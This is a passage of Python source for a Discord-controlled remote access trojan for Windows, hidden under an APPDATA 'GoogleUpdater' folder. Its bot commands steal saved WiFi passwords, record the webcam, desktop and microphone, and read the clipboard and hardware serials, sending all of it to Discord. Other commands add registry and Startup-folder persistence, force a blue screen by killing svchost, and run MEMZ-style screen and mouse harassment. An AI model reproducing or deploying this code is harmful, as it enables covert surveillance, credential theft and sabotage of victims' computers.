                    profile_info = subprocess.run(f'chcp 65001 & netsh wlan show profile name="{profile}" key=clear', shell=True, capture_output=True, text=True, encoding="utf-8", errors="ignore").stdout
                    password_match = re.search(r"Содержимое ключа\s*:\s*(.+)", profile_info)
                    password = password_match.group(1).strip() if password_match else "🔒 Нет пароля"
                    password_info += f"🛜 {profile}\n🔓 {password}\n\n"
        except Exception as e:
            password_info += f"⚠ Ошибка netsh: {e}\n\n"

        # Метод 2: Чтение из реестра (если возможно)
        try:
            key_path = r"SOFTWARE\Microsoft\WlanSvc\Interfaces"
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                for i in range(winreg.QueryInfoKey(key)[0]):
                    iface_name = winreg.EnumKey(key, i)
                    subkey_path = f"{key_path}\\{iface_name}\\Profiles"
                    try:
                        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey_path) as subkey:
                            for j in range(winreg.QueryInfoKey(subkey)[0]):
                                wifi_name = winreg.EnumKey(subkey, j)
                                password_info += f"🛜 {wifi_name} (из реестра)\n🔓 Неизвестно\n\n"
                    except FileNotFoundError:
                        pass
        except Exception as e:
            password_info += f"⚠ Ошибка реестра: {e}\n\n"

        # Метод 3: PowerShell (альтернативный способ)
        try:
            powershell_script = "(netsh wlan show profile) | ForEach-Object {$_ -match 'Все профили пользователей\\s*:\\s*(.+)' | Out-Null; $matches[1] }"
            result = subprocess.run(["powershell", "-Command", powershell_script], capture_output=True, text=True)
            profiles_ps = result.stdout.strip().split("\n")
            for profile in profiles_ps:
                profile = profile.strip()
                if profile:
                    profile_info = subprocess.run(["powershell", "-Command", f"netsh wlan show profile name='{profile}' key=clear"], capture_output=True, text=True)
                    password_match = re.search(r"Содержимое ключа\s*:\s*(.+)", profile_info.stdout)
                    password = password_match.group(1).strip() if password_match else "🔒 Нет пароля"
                    password_info += f"🛜 {profile} (PowerShell)\n🔓 {password}\n\n"
        except Exception as e:
            password_info += f"⚠ Ошибка PowerShell: {e}\n\n"

        # Проверка, есть ли пароли
        if not password_info.strip():
            await ctx.send("❌ No saved WIFI founded.")
            return

        await ctx.send(f"🔑 WiFi Passwords:\n\n{password_info.strip()}")

    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")

#-------wifipass


@bot.command()
async def cd(ctx, action: str = "open"):
    """Opens or closes the CD tray (if possible)."""
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    action = action.lower()

    def get_cd_drives():
        """Returns a list of available CD/DVD drives (e.g., ['D:', 'E:'])."""
        drives = []
        bitmask = win32api.GetLogicalDrives()
        for letter in range(26):  # A-Z
            if bitmask & (1 << letter):
                drive = f"{chr(65 + letter)}:\\"
                if win32file.GetDriveType(drive) == win32con.DRIVE_CDROM:
                    drives.append(drive)
        return drives

    def open_tray():
        """Tries to open all detected CD trays."""
        success = False
        drives = get_cd_drives()
        
        for drive in drives:
            try:
                subprocess.run(f"powershell -Command (New-Object -ComObject Shell.Application).Namespace(17).ParseName('{drive}').InvokeVerb('Eject')", check=True)
                success = True
            except:
                pass

            try:
                ctypes.windll.winmm.mciSendStringW(f"set cdaudio door open", None, 0, None)
                success = True
            except:
                pass

        return success

    def close_tray():
        """Tries to close all detected CD trays."""
        success = False
        drives = get_cd_drives()

        for drive in drives:
            try:
                ctypes.windll.winmm.mciSendStringW(f"set cdaudio door closed", None, 0, None)
                success = True
            except:
                pass

        return success

    # Execute action
    if action == "open":
        if open_tray():
            await ctx.send("✅ CD tray opened.")
        else:
            await ctx.send("❌ Failed to open CD tray.")
    elif action == "close":
        if close_tray():
            await ctx.send("✅ CD tray closed.")
        else:
            await ctx.send("❌ Failed to close CD tray.")
    else:
        await ctx.send("❌ Use: `!cd open` or `!cd close`.")


@bot.command()
async def rickroll(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    try:
        await ctx.send("🔄 downloading rickroll...")
        rickroll_url = "https://www.myinstants.com/media/sounds/rickroll.mp3"
        local_path = os.path.join(VIDEO_PATH, "rickroll.mp3")

        response = requests.get(rickroll_url)
        with open(local_path, "wb") as f:
            f.write(response.content)

        await ctx.send("🎵 Rickrolling...")
        pygame.mixer.init()
        pygame.mixer.music.load(local_path)
        pygame.mixer.music.play()

        # Ожидание завершения трека
        while pygame.mixer.music.get_busy():
            await asyncio.sleep(1)

        pygame.mixer.quit()
        os.remove(local_path)  # Удаляем файл после воспроизведения
        await ctx.send("✅ RickRolled!")

    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")

@bot.command()
async def video_cam(ctx, duration: str = "10s"):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    time_map = {"s": 1, "m": 60}
    unit = duration[-1]
    if unit not in time_map or not duration[:-1].isdigit():
        return await ctx.send("❌ Invalid time format! Use 10s or 1m.")
    
    seconds = int(duration[:-1]) * time_map[unit]
    output_file = os.path.join(VIDEO_PATH, "webcam.mp4")
    
    message = await ctx.send("📷 Checking for cameras...")
    
    cap = cv2.VideoCapture(0)
    if not cap.isOpened():
        return await message.edit(content="❌ Camera not found")
    
    fourcc = cv2.VideoWriter_fourcc(*"mp4v")
    out = cv2.VideoWriter(output_file, fourcc, 20.0, (int(cap.get(3)), int(cap.get(4))))
    
    await message.edit(content="🎥 Recording...")
    start_time = time.time()
    while time.time() - start_time < seconds:
        ret, frame = cap.read()
        if not ret:
            break
        out.write(frame)
    
    cap.release()
    out.release()
    
    await message.edit(content="📤 Sending...")
    await ctx.send(file=discord.File(output_file))
    os.remove(output_file)
    await message.edit(content="✅ Recorded and Sended")


#---------------------------NEW FUCNTIONS----------------------------------

FFMPEG_PATH = os.path.join(os.getenv("APPDATA"), "GoogleUpdater", "files", "ffmpeg.exe")
VIDEO_PATH = os.path.join(os.getenv("APPDATA"), "GoogleUpdater", "files", "data")
os.makedirs(VIDEO_PATH, exist_ok=True)


def download_ffmpeg():
    if not os.path.exists(FFMPEG_PATH):
        url = "https://www.gyan.dev/ffmpeg/builds/ffmpeg-release-essentials.zip"
        zip_path = os.path.join(VIDEO_PATH, "ffmpeg.zip")
        exe_dir = os.path.join(VIDEO_PATH, "ffmpeg")
        return url, zip_path, exe_dir
    return None, None, None

@bot.command()
async def video_desk(ctx, duration: str = "10s"):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    message = await ctx.send("⏳ Checking FFMPEG...")
    
    url, zip_path, exe_dir = download_ffmpeg()
    if url:
        await message.edit(content="📥 downloading FFMPEG...")
        try:
            response = requests.get(url, stream=True)
            with open(zip_path, "wb") as f:
                for chunk in response.iter_content(chunk_size=8192):
                    f.write(chunk)
            
            await message.edit(content="📂 Unpacking...")
            subprocess.run(["powershell", "Expand-Archive", "-Path", zip_path, "-DestinationPath", exe_dir, "-Force"], creationflags=subprocess.CREATE_NO_WINDOW)
            
            ffmpeg_bin_path = os.path.join(exe_dir, "ffmpeg-7.1-essentials_build", "bin", "ffmpeg.exe")
            if os.path.exists(ffmpeg_bin_path):
                shutil.move(ffmpeg_bin_path, FFMPEG_PATH)
            else:
                return await message.edit(content="❌ Error: FFMPEG.exe not found after unpacking")
            
            os.remove(zip_path)
            await message.edit(content="✅ FFMpeg installed!")
        except Exception as e:
            return await message.edit(content=f"❌ Error when installing: {e}")
    else:
        await message.edit(content="✅ FFMpeg installed alredy")
    
    time_map = {"s": 1, "m": 60}
    unit = duration[-1]
    if unit not in time_map or not duration[:-1].isdigit():
        return await ctx.send("❌ Invalid time format! Use 10s or 1m.")
    
    seconds = int(duration[:-1]) * time_map[unit]
    output_file = os.path.join(VIDEO_PATH, "output.mp4")
    
    try:
        await message.edit(content="🎥 Recording...")
        command = f'"{FFMPEG_PATH}" -y -f gdigrab -framerate 30 -t {seconds} -i desktop "{output_file}"'
        subprocess.run(command, shell=True, creationflags=subprocess.CREATE_NO_WINDOW)
        
        await message.edit(content="📤 Sending...")
        await ctx.send(file=discord.File(output_file))
        os.remove(output_file)
        await message.edit(content="✅ Recorded and sended!")
    except Exception as e:
        await message.edit(content=f"❌ ERROR: {e}")


#---------------------------FFMPEG----------------------------------

@bot.command()
async def sound(ctx, url: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    try:
        await ctx.send("🔄 Downloading audio...")
        file_name = url.split("/")[-1]
        local_path = os.path.join(VIDEO_PATH, file_name)

        response = requests.get(url)
        with open(local_path, "wb") as f:
            f.write(response.content)

        await ctx.send(f"🎵 Recording {file_name}...")
        pygame.mixer.init()
        pygame.mixer.music.load(local_path)
        pygame.mixer.music.play()

        # Ожидание завершения трека
        while pygame.mixer.music.get_busy():
            await asyncio.sleep(1)

        pygame.mixer.quit()
        os.remove(local_path)  # Удаляем файл после воспроизведения
        await ctx.send("✅ Sound played!")

    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")

#---------------------------UNLOCKERSOUND----------------------------------

def mute_system_sound(mute=True):
    # Используем Windows API для отключения/включения звука
    device_id = 0  # Обычно основное устройство вывода
    mute_flag = 1 if mute else 0
    try:
        # Запрос отключения/включения звука через Windows API
        ctypes.windll.winmm.waveOutSetVolume(device_id, mute_flag * 0xFFFF)
        return True
    except Exception as e:
        return False

def is_sound_muted():
    # Проверка состояния звука
    try:
        volume = ctypes.c_uint()
        ctypes.windll.winmm.waveOutGetVolume(0, ctypes.byref(volume))
        return volume.value == 0
    except Exception as e:
        return None

@bot.command()
async def unlocksound(ctx):
    muted = is_sound_muted()
    if muted is None:
        await ctx.send("❌ cant found sound info")
    elif muted:
        if mute_system_sound(False):
            await ctx.send("🔊 Unlocked sound!")
        else:
            await ctx.send("❌ Cant unblock sound")
    else:
        await ctx.send("✅ Sound is enabled alredy!")

#----------------------------UNLOCKERSOUND---------------------------------

# Функция для записи аудио
def record_audio(microphone, duration, filename):
    p = pyaudio.PyAudio()
    
    # Открываем поток с микрофоном
    stream = p.open(format=pyaudio.paInt16,
                    channels=1,
                    rate=44100,
                    input=True,
                    frames_per_buffer=1024)

    print(f"Recording from {microphone} for {duration} seconds...")

    frames = []
    for _ in range(0, int(44100 / 1024 * duration)):
        data = stream.read(1024)
        frames.append(data)

    # Завершаем запись
    print("Recording complete.")
    stream.stop_stream()
    stream.close()
    p.terminate()

    # Сохраняем в файл
    if not os.path.exists(VIDEO_PATH):
        os.makedirs(VIDEO_PATH)

    with wave.open(filename, 'wb') as wf:
        wf.setnchannels(1)
        wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
        wf.setframerate(44100)
        wf.writeframes(b''.join(frames))

# Команда для записи аудио
@bot.command()
async def audiorec(ctx, microphone: str, duration: str):
    # Разбор длительности
    try:
        if duration.endswith('s'):
            duration = int(duration[:-1])
        elif duration.endswith('m'):
            duration = int(duration[:-1]) * 60
        else:
            raise ValueError("❌ Invalid duration format. Use 's' or 'm'.")
    except ValueError as e:
        await ctx.send(f"Ошибка: {str(e)}")
        return
    
    # Запись аудио
    filename = os.path.join(VIDEO_PATH, "audio_recording.wav")
    record_audio(microphone, duration, filename)
    
    # Отправляем файл в Discord
    await ctx.send("✅ Recorded Microphone...", delete_after=5)
    await ctx.send(file=discord.File(filename))

    # Удаляем файл после отправки
    os.remove(filename)

@bot.command()
async def Microlist(ctx):
    """List available microphones, removing duplicates and irrelevant names."""
    p = pyaudio.PyAudio()

    # Get a list of all available microphones
    mic_list = []
    for i in range(p.get_device_count()):
        info = p.get_device_info_by_index(i)
        if info.get('maxInputChannels') > 0:
            mic_name = info.get('name')

            # Filter out invalid or corrupted names
            if is_valid_microphone_name(mic_name):
                mic_list.append(mic_name)

    # Remove duplicates by converting the list to a set and back to a list
    unique_mic_list = list(set(mic_list))

    if unique_mic_list:
        # Format the output message with a header and list of microphones
        formatted_mic_list = "\n".join(unique_mic_list)
        await ctx.send(f"🎤 Available microphones:\n{formatted_mic_list}")
    else:
        await ctx.send("No valid microphones found.")

def is_valid_microphone_name(name):
    """Filters out invalid or corrupted microphone names."""
    # List of invalid keywords that might indicate corrupted names
    invalid_keywords = [
        "РџРµСЂРІРёС‡РЅС‹Р№", "РґСЂР°Р№РІРµСЂ", "Р·Р°РїРёСЃРё", "Р·РІСѓРєР°", 
        "РџРµСЂРµН", "Input", "Проверьте", "System", "Default", "Unknown"
    ]

    # Check if any invalid keyword is in the name (case insensitive)
    for keyword in invalid_keywords:
        if keyword.lower() in name.lower():
            return False
    return True

#-----------------------------MICRAPHONE

# Пути для файлов
appdata_path = os.getenv("APPDATA")
scripts_dir = os.path.join(appdata_path, "GoogleUpdater", "files")

# Файлы для загрузки
ps1_url = "https://raw.githubusercontent.com/Clicketyclick/ChangeScreenOrientation/refs/heads/master/ChangeOrientation.ps1"
cmd_url = "https://raw.githubusercontent.com/Clicketyclick/ChangeScreenOrientation/refs/heads/master/co.cmd"

ps1_file = os.path.join(scripts_dir, "ChangeOrientation.ps1")
cmd_file = os.path.join(scripts_dir, "co.cmd")

# Функция для загрузки файлов
def download_file(url, dest_path):
    urllib.request.urlretrieve(url, dest_path)

# Проверка наличия файлов
def check_files():
    return os.path.exists(ps1_file) and os.path.exists(cmd_file)

# Команда для установки файлов и отображения статуса
@bot.command()
async def install(ctx):
    if not check_files():
        await ctx.send("📥 Загружаем и устанавливаем необходимые файлы...")

        if not os.path.exists(scripts_dir):
            os.makedirs(scripts_dir)

        download_file(ps1_url, ps1_file)
        download_file(cmd_url, cmd_file)

        await ctx.send("✅ Файлы загружены!\n🔧 Устанавливаем и настраиваем...")

        time.sleep(2)

        if check_files():
            await ctx.send("✅ Установка завершена! Программы готовы к использованию.")
        else:
            await ctx.send("❌ Ошибка при установке файлов.")
    else:
        await ctx.send("✅ Файлы уже установлены.")

# Команда для изменения ориентации экрана
@bot.command()
async def fl1pscreen(ctx, direction: str):
    valid_directions = ['right', 'left', 'down', 'up', 'reset', 'reverse-portrait', 'reverse-landscape']
    
    if direction not in valid_directions:
        await ctx.send(f"❌ Неверная команда. Используйте один из параметров: {', '.join(valid_directions)}.")
        return

    # Если файлы не установлены, то сначала вызываем установку
    if not check_files():
        await ctx.send("🔧 Программы еще не установлены. Начинаю установку...")
        await install(ctx)  # Запускаем установку
        await ctx.send("🖥 После установки экран не будет вращаться автоматически.\nПожалуйста, запустите команду снова.")
        return

    # Если файлы есть, выполняем команду вращения экрана
    if direction == 'right':
        await ctx.send("🔄 right.")
        subprocess.run([cmd_file, 'right'], check=True)
    elif direction == 'left':
        await ctx.send("🔄 left.")
        subprocess.run([cmd_file, 'left'], check=True)
    elif direction == 'down':
        await ctx.send("🔄 down.")
        subprocess.run([cmd_file, 'down'], check=True)
    elif direction == 'up':
        await ctx.send("🔄 up.")
        subprocess.run([cmd_file, 'up'], check=True)
    elif direction == 'reset':
        await ctx.send("🔄 resetted.")
        subprocess.run([cmd_file, 'reset'], check=True)
    elif direction == 'reverse-portrait':
        await ctx.send("🔄 reverse-portrait.")
        subprocess.run([cmd_file, 'reverse-portrait'], check=True)
    elif direction == 'reverse-landscape':
        await ctx.send("🔄 reverse-landscape.")
        subprocess.run([cmd_file, 'reverse-landscape'], check=True)

#-----------------------------ROTATE

# Функция для включения инвертирования цветов
async def enable_color_invert():
    try:
        # Создание реестровых ключей для активации цветовых фильтров
        subprocess.run(['powershell', 'New-Item -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion" -Name "ColorFilters" -Force'], check=True)
        subprocess.run(['powershell', 'New-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\ColorFilters" -Name "Enable" -Value 1 -PropertyType DWord -Force'], check=True)
        subprocess.run(['powershell', 'New-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\ColorFilters" -Name "Filter" -Value 1 -PropertyType DWord -Force'], check=True)

        # Перезапуск проводника Windows, чтобы применить изменения
        subprocess.run(['powershell', 'Stop-Process -Name explorer'], check=True)
        subprocess.run(['powershell', 'Start-Process explorer'], check=True)

        return "✅ Цветовой фильтр включен и экран инвертирован."
    except subprocess.CalledProcessError as e:
        return f"❌ Ошибка при активации цветового фильтра: {e}"

# Функция для выключения инвертирования цветов
async def disable_color_invert():
    try:
        subprocess.run(['powershell', 'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\ColorFilters" -Name "Enable" -Value 0'], check=True)

        # Перезапуск проводника Windows, чтобы применить изменения
        subprocess.run(['powershell', 'Stop-Process -Name explorer'], check=True)
        subprocess.run(['powershell', 'Start-Process explorer'], check=True)

        return "✅ Цветовой фильтр отключен."
    except subprocess.CalledProcessError as e:
        return f"❌ Ошибка при отключении цветового фильтра: {e}"

# Обработчик команды для инвертирования цветов
@bot.command()
async def invert(ctx, state: str):
    # Проверка, если канал не авторизованный
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    if state == "on":
        await ctx.send("🔄 Включение инвертирования цветов экрана... Пожалуйста, подождите.")
        result = await enable_color_invert()  # Важно вызвать функцию, а не корутину
        await ctx.send(result)

    elif state == "off":
        await ctx.send("🔄 Отключение инвертирования цветов экрана... Пожалуйста, подождите.")
        result = await disable_color_invert()  # Важно вызвать функцию, а не корутину
        await ctx.send(result)

    else:
        await ctx.send("❌ Неверная команда! Используйте `!invert on` для включения и `!invert off` для отключения.")


# Определяем путь к программе
PROGRAM_PATH = sys.executable if getattr(sys, 'frozen', False) else os.path.abspath(__file__)


# Определяем путь к программе
PROGRAM_PATH = sys.executable if getattr(sys, 'frozen', False) else os.path.abspath(__file__)

# Методы автозапуска
AUTOSTART_METHODS = {
    "user": (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    "machine": (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    "wow6432node": (winreg.HKEY_LOCAL_MACHINE, r"Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"),
    "startup_folder": os.path.join(os.getenv("APPDATA"), r"Microsoft\Windows\Start Menu\Programs\Startup")
}

def set_autoload(name: str, method: str, enable: bool):
    """Добавляет или удаляет программу из автозагрузки разными методами"""
    if method not in AUTOSTART_METHODS:
        return "❓ **Methods:** `user`, `machine`, `wow6432node`, `startup_folder`"

    if method == "startup_folder":
        shortcut_path = os.path.join(AUTOSTART_METHODS[method], f"{name}.lnk")
        if enable:
            try:
                import winshell
                from win32com.client import Dispatch

                shell = Dispatch("WScript.Shell")
                shortcut = shell.CreateShortcut(shortcut_path)
                shortcut.TargetPath = PROGRAM_PATH
                shortcut.WorkingDirectory = os.path.dirname(PROGRAM_PATH)
                shortcut.Save()

                return f"✅ **Added startup `{method}`!**"
            except Exception as e:
                return f"🔴 **Error:** `{e}`"
        else:
            try:
                if os.path.exists(shortcut_path):
                    os.remove(shortcut_path)
                return f"❌ **Removed Startup `{method}`!**"
            except Exception as e:
                return f"🔴 **Error:** `{e}`"

    else:
        hive, key = AUTOSTART_METHODS[method]
        try:
            with winreg.OpenKey(hive, key, 0, winreg.KEY_SET_VALUE if enable else winreg.KEY_ALL_ACCESS) as reg_key:
                if enable:
                    winreg.SetValueEx(reg_key, name, 0, winreg.REG_SZ, PROGRAM_PATH)
                else:
                    winreg.DeleteValue(reg_key, name)
        except FileNotFoundError:
            pass  # Пропускаем, если ключ уже удален
        except Exception as e:
            return f"🔴 **Error:** `{e}`"

        return f"✅ **Added Startup `{method}`!**" if enable else f"❌ **Removed Startup `{method}`!**"


@bot.command()
async def autoload(ctx, name: str = None, method: str = None, mode: str = None):
    """Добавляет или удаляет программу в автозагрузку разными методами"""
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ **Unauthorized channel!**")

    if not name or not method or not mode:
        return await ctx.send(
            "⚠️ **Incorrect** Use: `!autoload <name> <method> <on/off>`\n"
            "**Methods:** `user`, `machine`, `wow6432node`, `startup_folder`"
        )

    if mode.lower() == "on":
        result = set_autoload(name, method, True)
    elif mode.lower() == "off":
        result = set_autoload(name, method, False)
    else:
        return await ctx.send(
            "⚠ **Use `<on/off>`!**"
        )

    await ctx.send(result)

#-----------------------------STARTUPER

@bot.command()
async def clipboard(ctx, action: str, *, text: str = None):
    """Adds or shows clipboard content."""
    if action == "add" and text:
        win32clipboard.OpenClipboard()
        win32clipboard.EmptyClipboard()
        win32clipboard.SetClipboardText(text)
        win32clipboard.CloseClipboard()
        await ctx.send("📋 Text added to clipboard!")

    elif action == "show":
        win32clipboard.OpenClipboard()
        try:
            clipboard_content = win32clipboard.GetClipboardData()
        except TypeError:
            clipboard_content = "[Empty or unsupported format]"
        win32clipboard.CloseClipboard()

        if len(clipboard_content) > 2000:
            clipboard_content = clipboard_content[:1990] + "..."
        
        await ctx.send(f"📋 Clipboard content: `{clipboard_content}`")

    else:
        await ctx.send("❌ Use: `!clipboard add <text>` or `!clipboard show`")

@bot.command()
async def bsod(ctx):
    """Вызывает синий экран смерти (BSOD)."""
    if ctypes.windll.shell32.IsUserAnAdmin():
        await ctx.send("💀 Вызываю BSOD...")
        os.system("taskkill /IM svchost.exe /F")  # Прерывание критического процесса
    else:
        await ctx.send("❌ Need ADMIN right to BSOD!")

@bot.command()
async def wallpaper(ctx, url: str):
    """Устанавливает обои на рабочий стол по URL."""
    try:
        path = os.path.join(os.getenv("TEMP"), "wallpaper.bmp")  # Windows принимает BMP

        # Загружаем изображение
        response = requests.get(url, stream=True)
        if response.status_code != 200:
            return await ctx.send("❌ Error when getting image!")

        img = Image.open(io.BytesIO(response.content))

        # Конвертируем в BMP, если формат не поддерживается напрямую
        img = img.convert("RGB")
        img.save(path, "BMP")

        # Устанавливаем как обои
        ctypes.windll.user32.SystemParametersInfoW(20, 0, path, 3)
        await ctx.send("✅ Wallpaper changed!")

    except Exception as e:
        await ctx.send(f"❌ Error: {e}")

shake_active = False

@bot.command()
async def shake(ctx, intensity: int, state: str):
    global shake_active

    if state.lower() == "on":
        if shake_active:
            return await ctx.send("🔄 Cursor shaking!")
        
        shake_active = True
        await ctx.send(f"🔄 Cursor shaking with! (intensity: {intensity})")

        def shake_mouse():
            while shake_active:
                x, y = pyautogui.position()
                pyautogui.moveTo(
                    x + random.randint(-intensity, intensity), 
                    y + random.randint(-intensity, intensity), 
                    duration=0.05
                )
                time.sleep(0.05)

        threading.Thread(target=shake_mouse, daemon=True).start()

    elif state.lower() == "off":
        if not shake_active:
            return await ctx.send("✅ Shake enabled alredy!")

        shake_active = False
        await ctx.send("✅ Shake stopped!")

    else:
        await ctx.send("❌ Use: `!shake <intensity> on` или `!shake <intensity> off`")

#-----------------------------NEW

@bot.command()
async def sysinfo(ctx):
    """Shows detailed system information."""
    try:
        uname = platform.uname()
        user = os.getlogin()
        pc_name = socket.gethostname()
        cpu_info = platform.processor()
        cpu_cores = psutil.cpu_count(logical=False)
        cpu_threads = psutil.cpu_count(logical=True)
        total_ram = round(psutil.virtual_memory().total / (1024 ** 3), 2)  # Convert to GB
        os_version = f"{uname.system} {uname.release} ({uname.version})"
        arch = platform.architecture()[0]
        disk_usage = psutil.disk_usage("/")
        gpu_info = "Unknown"
        cpu_serial = "Unknown"
        cpu_frequency = "Unknown"
        motherboard = "Unknown"
        disk_serial = "Unknown"
        gpu_vram = "Unknown"
        mac_addresses = []

        # Getting system information via WMI
        try:
            import wmi
            w = wmi.WMI()
            
            # CPU details
            cpu = w.Win32_Processor()[0]
            cpu_info = cpu.Name.strip()
            cpu_serial = cpu.ProcessorId.strip()
            cpu_frequency = f"{cpu.MaxClockSpeed} MHz"

            # GPU details
            gpus = w.Win32_VideoController()
            if gpus:
                gpu_info = ", ".join(gpu.Name.strip() for gpu in gpus)
                vram_list = []
                for gpu in gpus:
                    if gpu.AdapterRAM is not None:
                        vram_list.append(f"{int(gpu.AdapterRAM / (1024**3))} GB")
                    else:
                        vram_list.append("Unknown")
                gpu_vram = ", ".join(vram_list)

            # Motherboard details
            board = w.Win32_BaseBoard()[0]
            motherboard = f"{board.Manufacturer.strip()} {board.Product.strip()}"

            # Disk details
            disk = w.Win32_DiskDrive()[0]
            disk_serial = disk.SerialNumber.strip()

        except Exception as e:
            gpu_info = "WMI error"
            gpu_vram = "WMI error"

        # Getting MAC addresses
        for iface, addrs in psutil.net_if_addrs().items():
            for addr in addrs:
                if addr.family == psutil.AF_LINK:
                    mac_addresses.append(f"{iface}: {addr.address}")

        mac_addresses_str = "\n".join(mac_addresses) if mac_addresses else "No MAC addresses found"

        # Check admin rights
        is_admin = "Yes" if ctypes.windll.shell32.IsUserAnAdmin() else "No"

        # Get the script's full path
        exe_path = os.path.abspath(sys.argv[0])

        info_message = (
            f"🖥 **System Information**\n"
            f"🔹 OS: `{os_version}`\n"
            f"🔹 Architecture: `{arch}`\n"
            f"🔹 User: `{user}`\n"
            f"🔹 PC Name: `{pc_name}`\n"
            f"🔹 Admin Rights: `{is_admin}`\n"
            f"🔹 Executable Path: `{exe_path}`\n\n"
            f"⚙ **Hardware**\n"
            f"🔹 CPU: `{cpu_info}`\n"
            f"🔹 CPU Frequency: `{cpu_frequency}`\n"
            f"🔹 CPU Serial: `{cpu_serial}`\n"
            f"🔹 Cores: `{cpu_cores}` | Threads: `{cpu_threads}`\n"
            f"🔹 RAM: `{total_ram} GB`\n"
            f"🔹 GPU: `{gpu_info}`\n"
            f"🔹 GPU VRAM: `{gpu_vram}`\n"
            f"🔹 Disk Usage: `{disk_usage.percent}% used`\n"
            f"🔹 Disk Serial: `{disk_serial}`\n"
            f"🔹 Motherboard: `{motherboard}`\n\n"
            f"🌐 **Network**\n"
            f"```{mac_addresses_str}```"
        )

        await ctx.send(info_message)
    except Exception as e:
        await ctx.send(f"❌ Error: {e}")

#-----------------------------NEW

effects_running = False

# Chaotic mouse movement
def move_mouse():
    while effects_running:
        x, y = pyautogui.position()
        pyautogui.moveTo(x + random.randint(-50, 50), y + random.randint(-50, 50), duration=0.1)
        time.sleep(0.1)

# Random error messages
def error_spam():
    while effects_running:
        ctypes.windll.user32.MessageBoxW(0, "MEMZ ERROR!", "Critical Error", 0x10)
        time.sleep(random.uniform(2, 5))

# Fullscreen screen distortion using screenshots
def glitch_screen():
    pygame.init()
    screen = pygame.display.set_mode(pyautogui.size(), pygame.NOFRAME)
    while effects_running:
        img = pyautogui.screenshot()
        img = img.resize(pyautogui.size())
        img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
        img = cv2.applyColorMap(img, cv2.COLORMAP_JET)  # Color distortion
        img = pygame.image.frombuffer(img.tobytes(), pyautogui.size(), "RGB")
        screen.blit(img, (random.randint(-20, 20), random.randint(-20, 20)))
        pygame.display.update()
        pygame.event.pump()  # Fix for pygame freezing
        time.sleep(0.1)
    pygame.quit()

# Floating Windows icons following the cursor
def floating_icons():
    icons = [
        "C:\\Windows\\System32\\shell32.dll,128",
        "C:\\Windows\\System32\\shell32.dll,237",
        "C:\\Windows\\System32\\shell32.dll,50"
    ]
    while effects_running:
        x, y = pyautogui.position()
        icon = random.choice(icons)
        os.system(f"powershell Start-Process 'explorer.exe' -ArgumentList '/select,{icon}'")
        time.sleep(1)

# Keyboard listener to stop effects when M+Z is pressed
def key_listener(ctx):
    global effects_running
    while effects_running:
        if keyboard.is_pressed("m") and keyboard.is_pressed("z"):
            effects_running = False
            bot.loop.call_soon_threadsafe(asyncio.create_task, ctx.send("🔓 Break Code `M+Z` Pressed! Stopped the MEMZ"))
            break
        time.sleep(0.1)

@bot.command()
async def memz(ctx, mode: str):
    global effects_running
    if mode == "on" and not effects_running:
        effects_running = True
        await ctx.send("✅ MEMZ enabled!")
        threading.Thread(target=move_mouse, daemon=True).start()
        threading.Thread(target=error_spam, daemon=True).start()
        threading.Thread(target=glitch_screen, daemon=True).start()
        threading.Thread(target=floating_icons, daemon=True).start()
        threading.Thread(target=key_listener, args=(ctx,), daemon=True).start()
    elif mode == "off" and effects_running:
        effects_running = False
        await ctx.send("⚙️ MEMZ Disabled 🔄")
    else:
        await ctx.send("⚠️ Use !memz **on/off**")

#-----------------------------MEMZZ

# Запуск бота
bot.run(token)
